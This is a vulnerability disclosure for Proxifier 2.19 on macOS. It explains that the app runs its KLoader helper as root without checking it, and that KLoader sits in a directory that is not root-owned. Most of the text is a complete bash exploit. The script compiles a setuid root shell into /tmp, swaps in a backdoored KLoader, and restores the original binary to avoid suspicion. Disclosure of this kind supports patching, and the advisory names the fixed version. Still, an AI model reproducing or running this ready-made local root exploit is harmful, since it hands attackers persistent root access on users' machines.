Proxifier 2.19 Privilege Escalation / Code Execution

Proxifier version 2.19 introduced a kext signature verification to the KLoader binary as a fix for CVE-2017-7643 but Proxifier.app performs no verification of the KLoader binary that gets executed as root.


MD5 | 8283d1273a246d055aa147f0939a068d

With CVE-2017-7643 I disclosed a command injection vulnerablity in the 
KLoader
binary that ships with Proxifier <= 2.18.

Unfortunately 2.19 is also vulnerable to a slightly different attack
that
yields the same result.

When Proxifier is first run, if the KLoader binary is not suid root it
gets
executed as root by Proxifier.app (the user is prompted to enter an
admin
password). The KLoader binary will then make itself suid root so that
it
doesn't need to prompt the user again.

The Proxifier developers added parameter sanitisation and kext signature
verification to the KLoader binary as a fix for CVE-2017-7643 but
Proxifier.app
does no verification of the KLoader binary that gets executed as root.

The directory KLoader sits in is not root-owned so we can replace it
with
our own binary that will get executed as root when Proxifier starts.

To avoid raising any suspicion, as soon we get executed as root we can
swap
the real KLoader binary back into place and forward the execution call
on
to it. It does require the user to re-enter their credentials the next
time
Proxifier is run but it's likely most users wouldn't think anything of
this.

Users should upgrade to version 2.19.2.

https://m4.rkw.io/proxifier_privesc_219.sh.txt
3e30f1c7ea213e0ae1f4046e1209124ee79a5bec479fa23d0b2143f9725547ac
-------------------------------------------------------------------

#!/bin/bash

#####################################################################
# Local root exploit for vulnerable KLoader binary distributed with #
# Proxifier for Mac v2.19 #
#####################################################################
# by m4rkw, shouts to #coolkids :P #
#####################################################################

cat > a.c <<EOF
#include <stdio.h>
#include <unistd.h>

int main()
{
setuid(0);
seteuid(0);

execl("/bin/bash", "bash", NULL);
return 0;
}
EOF

gcc -o /tmp/a a.c

cat > a.c <<EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>

int main(int ac, char *av[])
{
if (geteuid() != 0) {
printf("KLoader: UID not set to 0\n");
return 104;
} else {
seteuid(0);
setuid(0);

chown("/tmp/a", 0, 0);
chmod("/tmp/a", strtol("4755", 0, 8));
rename("/Applications/Proxifier.app/Contents/KLoader2",
"/Applications/Proxifier.app/Contents/KLoader");
chown("/Applications/Proxifier.app/Contents/KLoader", 0, 0);
chmod("/Applications/Proxifier.app/Contents/KLoader",
strtol("4755", 0, 8));
execv("/Applications/Proxifier.app/Contents/KLoader", av);

return 0;
}
}
EOF

mv -f /Applications/Proxifier.app/Contents/KLoader
/Applications/Proxifier.app/Contents/KLoader2
gcc -o /Applications/Proxifier.app/Contents/KLoader a.c
rm -f a.c

echo "Backdoored KLoader installed, the next time Proxifier starts
/tmp/a will become suid root."

-------------------------------------------------------------------



Related Posts

Comments